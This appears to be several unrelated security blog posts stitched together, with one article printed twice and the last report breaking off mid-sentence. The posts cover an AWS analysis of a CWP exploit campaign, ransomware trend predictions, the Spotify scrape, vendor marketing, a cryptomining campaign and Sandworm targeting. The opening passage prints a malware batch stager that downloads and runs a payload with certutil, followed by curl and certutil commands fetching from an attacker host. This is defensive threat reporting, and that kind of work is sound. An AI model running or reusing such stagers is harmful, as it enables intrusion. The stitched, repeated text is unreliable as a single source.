del %v%
for /f "tokens=*" %%A in ('wmic os get osarchitecture ^| findstr 64') do (
set "ARCH=64"
)
if "%ARCH%"=="64" (
certutil.exe -urlcache -split -f %u64% %v%
) else (
certutil.exe -urlcache -split -f %u32% %v%
)
start "" %v%
exit /b 0
The Linux script (SHA256: bdf17b30...) supported x86_64, i386, i686, aarch64, and armv7l architectures:
Layer 3 – By analyzing these staging scripts and referenced infrastructure, MadPot identified additional threat indicators revealing Mythic C2 framework endpoints:
Health check endpoint
196.251.116[.]232:7443 and vc2.b1ack[.]cat:7443
HTTP listener
196.251.116[.]232:80 and vc2.b1ack[.]cat:80
Within 30 minutes of MadPot’s analysis, Network Firewall instances globally deployed protection rules targeting every layer of this attack infrastructure. Vulnerable CWP installations remained protected against this campaign because when the exploit tried to execute curl -fsSL -m180 hxxp://vc2.b1ack[.]cat:28571/slt or certutil.exe -urlcache -split -f hxxp://vc2.b1ack[.]cat:28571/swt Network Firewall would have blocked both resolution of vc2.b1ack[.]cat domain and connections to 196.251.116[.]232:28571 for as long as the infrastructure was active. The vulnerable application might have executed the exploit payload, but Network Firewall blocked the malware download at the network layer.
Even if the staging scripts somehow reached a target through alternate means, they would fail when attempting to download Mythic agent binaries. The architecture-specific URLs would have been blocked. If a Mythic agent binary was somehow delivered and executed through a completely different infection vector, it still could not establish command-and-control. When the malware attempted to connect to the Mythic framework’s health endpoint on port 7443 or the HTTP listener on port 80, Network Firewall would have terminated those connections at the network perimeter.
This scenario shows how the active threat defense intelligence pipeline disrupts different stages of threat activities. This is the Swiss cheese model in practice: even when one defensive layer (for example OAST blocking) isn’t applicable, subsequent layers (downloading hosted malware, network behavior from malware, identifying botnet infrastructure) provide overlapping protection. MadPot analysis of the attack reveals additional threat indicators at each layer that would protect customers at different stages of the attack chain.
For GuardDuty customers with unpatched CWP installations, this meant they would have received threat detection findings for communication attempts with threat indicators tracked in active threat detection. For Network Firewall customers using active threat detection, unpatched CWP workloads would have automatically been protected against this campaign even before this CVE was added to the CISA Known Exploitable Vulnerability list on November 4.
Conclusion
AWS active threat defense for Network Firewall uses MadPot intelligence and multi-layered protection to disrupt attacker kill chains and reduce the operational burden for security teams. With automated rule deployment, active threat defense creates multi-layered defenses within 30 minutes of new threats being detected by MadPot. Amazon GuardDuty customers automatically receive threat detection findings when workloads attempt to communicate with malicious infrastructure identified by active threat defense, while AWS Network Firewall customers can actively block these threats using the active threat defense managed rule group. To get started, see Improve your security posture using Amazon threat intelligence on AWS Network Firewall.
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.
Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.
The ransomware paradox: More attacks, less money
By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.
For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.
This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.
Trend 1: DDoS services return to the RaaS model
With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.
The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.
What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.
Trend 2: Insider recruitment attempts are accelerating
Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.
The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.
What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.
Trend 3: Gig workers as unwitting attack vectors
According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.
The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.
What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.
Looking ahead: One big prediction for 2026
The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.
Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.
The bottom line: Strengthen your ransomware defenses
Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:
Explore Recorded Future'sRansomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
Read our latestInsikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.”
“A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.”
Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets.
Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams.
Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards.
From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time.
The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it.
And hiding behind violations of terms and conditions—which have never stopped criminals—is not effective security control.
How does this affect you?
There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details.
Some general Spotify security tips, to be on the safe side:
If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind.
Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website.
Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware.
We don’t just report on threats – we help protect your social media
Hacktivist group Anna’s Archive claims to have scraped almost all of Spotify’s catalog and is now seeding it via BitTorrent, effectively turning a streaming platform into a roughly 300 TB pirate “preservation archive.”
“A while ago, we discovered a way to scrape Spotify at scale. We saw a role for us here to build a music archive primarily aimed at preservation.”
Spotify insists that the hacktivists obtained no user data. Still, the incident highlights how large‑scale scraping, digital rights management (DRM) circumvention, and weak abuse controls can turn major content platforms into high‑value targets.
Anna’s Archive claims it obtained metadata for around 256 million tracks and audio files for roughly 86 million songs, totaling close to 300 TB. Reportedly, this represents about 99.9% of Spotify’s catalog and roughly 99.6% of all streams.
Spotify says it has “identified and disabled the nefarious user accounts that engaged in unlawful scraping” and implemented new safeguards.
From a security perspective, this incident is a textbook example of how scraping can escalate beyond “just metadata” into industrial‑scale content theft. By combining public APIs, token abuse, rate‑limit evasion, and DRM bypass techniques, attackers can extract protected content at scale. If you can create or compromise enough accounts and make them appear legitimate, you can chip away at content protections over time.
The “Spotify scrape” will likely be framed as a copyright story. But from a security angle, it serves as a reminder: if a platform exposes content or metadata at scale, someone will eventually automate access to it, weaponize it, and redistribute it.
And hiding behind violations of terms and conditions—which have never stopped criminals—is not effective security control.
How does this affect you?
There is currently no indication that passwords, payment details, or private playlists were exposed. This incident is purely about content and metadata, not user databases. That said, scammers may still claim otherwise. Be cautious of messages alleging your account data was compromised and asking for your login details.
Some general Spotify security tips, to be on the safe side:
If you have reused your Spotify password elsewhere or shared your credentials, consider changing your password for peace of mind.
Regularly review active sessions on streaming services and revoke anything you do not recognize. Spotify does not offer per-device session management, but you can sign out of all devices via Account > Settings and privacy on the Spotify website.
Avoid unofficial downloaders, converters, or “Spotify mods” that ask for your login or broad OAuth permissions. These tools often rely on the same kind of scraping infrastructure—or worse, function as credential-stealing malware.
We don’t just report on threats – we help protect your social media
Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.
Why Digital Threat Detection Requires a New Approach
Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:
High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
Alert fatigue from manually sifting through noise to find high-risk signals.
As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.
Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.
The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.
Leaked credentials and account takeover attempts (stolen identities)
Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.
Brand impersonation, domain spoofing, and phishing campaigns
Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.
Vulnerability exploitation and zero-day threats in the external attack surface
Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.
Dark web chatter and early warning signs of planned ransomware or DDoS attacks
Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.
Why an Intelligence-Driven Approach is Better
For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.
Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.
The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.
Essential Digital Threat Detection Tools and Technologies
Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.
Threat Intelligence Platforms: The Engines of Context
No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.
Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:
Open web reporting
Underground forums
Dark web marketplaces
Malware sandboxes
Threat feeds
Researcher data
Once the data is normalized, the platform enriches it with context, such as:
Relationships between indicators
Associations with known threat actors
Infrastructure reuse
Activity targeting specific industries or regions
This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.
Security Orchestration, Automation, and Response (SOAR)
While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.
Key SOAR capabilities include:
Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
Initiating takedown workflows for harmful domains or impersonation infrastructure
Coordinating actions across multiple security tools to ensure a unified response
Documenting each step of the investigation for reporting and compliance
By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.
Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration
EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.
EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.
Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.
Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.
Overcoming the Analyst’s Biggest Pain Points
Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.
The Drain of Alert Fatigue and False Positives
High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.
The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.
The Blind Spots of External Risk
Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.
These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.
Recorded Future: Operationalizing Digital Threat Intelligence at Scale
Recorded Future’s approach to digital threat detection delivers real-time intelligence at enterprise scale, closing the visibility gaps that make modern detection so difficult and giving you the context you need, the moment you need it.
Real-Time Context from the Intelligence GraphⓇ
The Intelligence GraphⓇ addresses the fragmentation of global threat data, one of the most persistent challenges in modern security operations. Threat activity unfolds across millions of sources, including:
Open web
Dark web marketplaces
Malware repositories
Technical feeds
Network telemetry
Closed underground forums
No analyst team could manually track, interpret, and connect this information at the speed attackers operate. The Intelligence GraphⓇ solves this problem by continuously indexing and analyzing this vast ecosystem in real time. It structures billions of data points into clear relationships among threat actors, infrastructure, malware families, vulnerabilities, and targeted industries. Because these connections are made automatically, the platform can deliver immediate, decision-ready context on any indicator.
Comprehensive Digital Risk Protection for External Threats
Real-time context helps analysts understand what a threat is and who is behind it. But detection isn’t only about interpreting indicators; it's also about discovering specific threats against your organization across the broader internet.
Recorded Future’s Digital Risk Protection (DRP) solution focuses on the same external spaces where global threat activity occurs, but applies a different lens: it monitors those environments for anything tied to your brand, domains, executives, or employees. This targeted approach ensures you see early signals of impersonation, credential theft, or emerging attacks long before they reach your internal systems.
Accelerating Time-to-Action through Integrated Intelligence
Recorded Future accelerates detection and response by delivering high-fidelity intelligence directly into the tools analysts already rely on.
An extensive ecosystem of pre-built integrations and flexible APIs connect directly with every major SIEM, SOAR, and EDR platform. These integrations feed enriched threat context, dynamic Risk Scores, and prioritized intelligence into the tools analysts already use.
Collective InsightsⓇ adds a layer of visibility that other tools cannot provide. It consolidates detections from across your SIEM, EDR, SOAR, IAM, and other security platforms into a single view, then enriches them with high-fidelity Recorded Future intelligence.
This approach connects internal alerts to one another and exposes relationships that would remain hidden when each tool operates in isolation. By identifying MITRE ATT&CK® tactics, techniques and procedures (TTPs) and attributing malware, it surfaces attack patterns you can only see from an aggregated view.
Smarter, Faster Security Decisions
Recorded Future delivers the automated, contextual intelligence needed to identify risks the moment they emerge and empower teams to respond with confidence.
By unifying internal telemetry with real-time global threat insight and organization-specific targeting data, the platform enables smarter prioritization, faster action, and dramatically less noise.
These intelligence-driven workflows directly improve core detection metrics such as time-to-detect (TTD) and time-to-contain (TTC), giving organizations a measurable way to demonstrate progress and strengthen operational resilience.
Strengthen your security program and move toward intelligence-driven operations with confidence. Explore how Recorded Future can support your Digital Threat Detection strategy.
Fraud enables cyber operations: Threat actors used compromised payment cards validated through Chinese-operated card-testing services to attempt unauthorized access to Anthropic's AI platform during a reported state-sponsored espionage campaign.
Card testing signals downstream attacks: The observed fraud followed a predictable kill chain—compromise, validation, resale, and attempted cashout—providing early warning indicators that preceded the final malicious transaction.
Recorded Future’s take: Proactive fraud intelligence prevents broader threats. Tester merchant intelligence can identify compromised cards before they're used for high-value fraud or to support advanced threat actor operations.
Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection was able to correlate signals across these data sources to raise a critical severity attack sequence finding. Using the massive, advanced threat intelligence capability and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this ongoing campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action on this ongoing campaign.
It’s important to note that these actions don’t take advantage of a vulnerability within an AWS service but rather require valid credentials that an unauthorized user uses in an unintended way. Although these actions occur in the customer domain of the shared responsibility model, AWS recommends steps that customers can use to detect, prevent, or reduce the impact of such activity.
Understanding the crypto mining campaign
The recently detected crypto mining campaign employed a novel persistence technique designed to disrupt incident response and extend mining operations. The ongoing campaign was originally identified when GuardDuty security engineers discovered similar attack techniques being used across multiple AWS customer accounts, indicating a coordinated campaign targeting customers using compromised IAM credentials.
Operating from an external hosting provider, the threat actor quickly enumerated Amazon EC2 service quotas and IAM permissions before deploying crypto mining resources across Amazon EC2 and Amazon ECS. Within 10 minutes of the threat actor gaining initial access, crypto miners were operational.
A key technique observed in this attack was the use of ModifyInstanceAttribute with disable API termination set to true, forcing victims to re-enable API termination before deleting the impacted resources. Disabling instance termination protection adds an additional consideration for incident responders and can disrupt automated remediation controls. The threat actor’s scripted use of multiple compute services, in combination with emerging persistence techniques, represents an advancement in crypto mining persistence methodologies that security teams should be aware of.
The multiple detection capabilities of GuardDuty successfully identified the malicious activity through EC2 domain/IP threat intelligence, anomaly detection, and Extended Threat Detection EC2 attack sequences. GuardDuty Extended Threat Detection was able to correlate signals as an AttackSequence:EC2/CompromisedInstanceGroup finding.
Indicators of compromise (IoCs)
Security teams should monitor for the following indicators to identify this crypto mining campaign. Threat actors frequently modify their tactics and techniques, so these indicators might evolve over time:
Malicious container image – The Docker Hub image yenik65958/secret, created on October 29, 2025, with over 100,000 pulls, was used to deploy crypto miners to containerized environments. This malicious image contained a SBRMiner-MULTI binary for crypto mining. This specific image has been taken down from Docker Hub, but threat actors might deploy similar images under different names.
Automation and tooling – AWS SDK for Python (Boto3) user agent patterns indicating Python-based automation scripts were used across the entire attack chain.
Crypto mining domains:asia[.]rplant[.]xyz, eu[.]rplant[.]xyz, and na[.]rplant[.]xyz.
Infrastructure naming patterns – Auto scaling groups followed specific naming conventions: SPOT-us-east-1-G*-* for spot instances and OD-us-east-1-G*-* for on-demand instances, where G indicates the group number.
Attack chain analysis
The crypto mining campaign followed a systematic attack progression across multiple phases. Sensitive fields in this post were given fictitious values to protect personally identifiable information (PII).
Figure 1: Cryptocurrency mining campaign diagram
Initial access, discovery, and attack preparation
The attack began with compromised IAM user credentials possessing admin-like privileges from an anomalous network and location, triggering GuardDuty anomaly detection findings. During the discovery phase, the attacker systematically probed customer AWS environments to understand what resources they could deploy. They checked Amazon EC2 service quotas (GetServiceQuota) to determine how many instances they could launch, then tested their permissions by calling the RunInstances API multiple times with the DryRun flag enabled.
The DryRun flag was a deliberate reconnaissance tactic that allowed the actor to validate their IAM permissions without actually launching instances, avoiding costs and reducing their detection footprint. This technique demonstrates the threat actor was validating their ability to deploy crypto mining infrastructure before acting. Organizations that don’t typically use DryRun flags in their environments should consider monitoring for this API pattern as an early warning indicator of compromise. AWS CloudTrail logs can be used with Amazon CloudWatchalarms, Amazon EventBridge, or your third-party tooling to alert on these suspicious API patterns.
The threat actor called two APIs to create IAM roles as part of their attack infrastructure: CreateServiceLinkedRole to create a role for auto scaling groups and CreateRole to create a role for AWS Lambda. They then attached the AWSLambdaBasicExecutionRole policy to the Lambda role. These two roles were integral to the impact and persistence stages of the attack.
Amazon ECS impact
The threat actor first created dozens of ECS clusters across the environment, sometimes exceeding 50 ECS clusters in a single attack. They then called RegisterTaskDefinition with a malicious Docker Hub image yenik65958/secret:user. With the same string used for the cluster creation, the actor then created a service, using the task definition to initiate crypto mining on ECS AWS Fargate nodes. The following is an example of API request parameters for RegisterTaskDefinition with a maximum CPU allocation of 16,384 units.
Figure 2: Contents of the cryptocurrency mining script within the malicious image
The malicious image (yenik65958/secret:user) was configured to execute run.sh after it has been deployed. run.sh runs randomvirel mining algorithm with the mining pools: asia|eu|na[.]rplant[.]xyz:17155. The flag nproc --all indicates that the script should use all processor cores.
Amazon EC2 impact
The actor created two launch templates (CreateLaunchTemplate) and 14 auto scaling groups (CreateAutoScalingGroup) configured with aggressive scaling parameters, including a maximum size of 999 instances and desired capacity of 20. The following example of request parameters from CreateLaunchTemplate shows the UserData was supplied, instructing the instances to begin crypto mining.
The threat actor created auto scaling groups using both Spot and On-Demand Instances to make use of both Amazon EC2 service quotas and maximize resource consumption.
Spot Instance groups:
Targeted high performance GPU and machine learning (ML) instances (g4dn, g5, g5, p3, p4d, inf1)
Configured with 0% on-demand allocation and capacity-optimized strategy
After exhausting auto scaling quotas, the actor directly launched additional EC2 instances using RunInstances to consume the remaining EC2 instance quota.
Persistence
An interesting technique observed in this campaign was the threat actor’s use of ModifyInstanceAttribute across all launched EC2 instances to disable API termination. Although instance termination protection prevents accidental termination of the instance, it adds an additional consideration for incident response capabilities and can disrupt automated remediation controls. The following example shows request parameters for the API ModifyInstanceAttribute.
After all mining workloads were deployed, the actor created a Lambda function with a configuration that bypasses IAM authentication and creates a public Lambda endpoint. The threat actor then added a permission to the Lambda function that allows the principal to invoke the function. The following examples show CreateFunctionUrlConfig and AddPermission request parameters.
To prevent public Lambda URLs from being created, organizations can deploy service control policies (SCPs) that deny creation or updating of Lambda URLs with an AuthType of “NONE”.
The multilayered detection approach of GuardDuty proved highly effective in identifying all stages of the attack chain using threat intelligence, anomaly detection, and the recently launched Extended Threat Detection capabilities for EC2 and ECS.
Next, we walk through the details of these features and how you can deploy them to detect attacks such as these. You can enable GuardDuty foundational protection plan to receive alerts on crypto mining campaigns like the one described in this post. To further enhance detection capabilities, we highly recommend enabling GuardDuty Runtime Monitoring, which will extend finding coverage to system-level events on Amazon EC2, Amazon ECS, and Amazon Elastic Kubernetes Service (Amazon EKS).
GuardDuty EC2 findings
Threat intelligence findings for Amazon EC2 are part of the GuardDuty foundational protection plan, which will alert you to suspicious network behaviors involving your instances. These behaviors can include brute force attempts, connections to malicious or crypto domains, and other suspicious behaviors. Using third-party threat intelligence and internal threat intelligence, including active threat defense and MadPot, GuardDuty provides detection over the indicators in this post through the following findings: CryptoCurrency:EC2/BitcoinTool.B and CryptoCurrency:EC2/BitcoinTool.B!DNS.
GuardDuty IAM findings
The IAMUser/AnomalousBehavior findings spanning multiple tactic categories (PrivilegeEscalation, Impact, Discovery) showcase the ML capability of GuardDuty to detect deviations from normal user behavior. In the incident described in this post, the compromised credentials were detected due to the threat actor using them from an anomalous network and location and calling APIs that were unusual for the accounts.
GuardDuty Runtime Monitoring
GuardDuty Runtime Monitoring is an important component for Extended Threat Detection attack sequence correlation. Runtime Monitoring provides host level signals, such as operating system visibility, and extends detection coverage by analyzing system-level logs indicating malicious process execution at the host and container level, including the execution of crypto mining programs on your workloads. The CryptoCurrency:Runtime/BitcoinTool.B!DNS and CryptoCurrency:Runtime/BitcoinTool.B findings detect network connections to crypto-related domains and IPs, while the Impact:Runtime/CryptoMinerExecuted finding detects when a process running is associated with a cryptocurrency mining activity.
GuardDuty Extended Threat Detection
Launched at re:Invent 2025, AttackSequence:EC2/CompromisedInstanceGroup finding represents one of the latest Extended Threat Detection capabilities in GuardDuty. This feature uses AI and ML algorithms to automatically correlate security signals across multiple data sources to detect sophisticated attack patterns of EC2 resource groups. Although AttackSequences for EC2 are included in the GuardDuty foundational protection plan, we strongly recommend enabling Runtime Monitoring. Runtime Monitoring provides key insights and signals from compute environments, enabling detection of suspicious host-level activities and improving correlation of attack sequences. For AttackSequence:ECS/CompromisedCluster attack sequences, Runtime Monitoring is required to correlate container-level activity.
Monitoring and remediation recommendations
To protect against similar crypto mining attacks, AWS customers should prioritize strong identity and access management controls. Implement temporary credentials instead of long-term access keys, enforce multi-factor authentication (MFA) for all users, and apply least privilege to IAM principals limiting access to only required permissions. You can use AWS CloudTrail to log events across AWS services and combine logs into a single account to make them available to your security teams to access and monitor. To learn more, refer to Receiving CloudTrail log files from multiple accounts in the CloudTrail documentation.
Confirm GuardDuty is enabled across all accounts and Regions with Runtime Monitoring enabled for comprehensive coverage. Integrate GuardDuty with AWS Security Hub and Amazon EventBridge or third-party tooling to enable automated response workflows and rapid remediation of high-severity findings. Implement container security controls, including image scanning policies and monitoring for unusual CPU allocation requests in ECS task definitions. Finally, establish specific incident response procedures for crypto mining attacks, including documented steps to handle instances with disabled API termination—a technique used by this attacker to complicate remediation efforts.
As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure.
Going into 2026, organizations must prioritize securing their network edge devices and monitoring for credential replay attacks to defend against this persistent threat. Based on infrastructure overlaps with known Sandworm (also known as APT44 and Seashell Blizzard) operations observed in Amazon’s telemetry and consistent targeting patterns, we assess with high confidence this activity cluster is associated with Russia’s Main Intelligence Directorate (GRU). The campaign demonstrates sustained focus on Western critical infrastructure, particularly the energy sector, with operations spanning 2021 through the present day.
Technical details
Campaign scope and targeting: Amazon Threat Intelligence observed sustained targeting of global infrastructure between 2021-2025, with particular focus on the energy sector. The campaign demonstrates a clear evolution in tactics.
2022-2023: Confluence vulnerability exploitation (CVE-2021-26084, CVE-2023-22518); continued misconfigured device targeting
2024: Veeam exploitation (CVE-2023-27532); continued misconfigured device targeting
2025: Sustained targeting of misconfigured customer network edge device targeting; decline in N-day/zero-day exploitation activity
Primary targets:
Energy sector organizations across Western nations
Critical infrastructure providers in North America and Europe
Organizations with cloud-hosted network infrastructure
Commonly targeted resources:
Enterprise routers and routing infrastructure
VPN concentrators and remote access gateways
Network management appliances
Collaboration and wiki platforms
Cloud-based project management systems
Targeting the “low-hanging fruit” of likely misconfigured customer devices with exposed management interfaces achieves the same strategic objectives, which is persistent access to critical infrastructure networks and credential harvesting for accessing victim organizations’ online services. The threat actor’s shift in operational tempo represents a concerning evolution: while customer misconfiguration targeting has been ongoing since at least 2022, the actor maintained sustained focus on this activity in 2025 while reducing investment in zero-day and N-day exploitation. The actor accomplishes this while significantly reducing the risk of exposing their operations through more detectable vulnerability exploitation activity.
Credential harvesting operations
While we did not directly observe the victim organization credential extraction mechanism, multiple indicators point to packet capture and traffic analysis as the primary collection method:
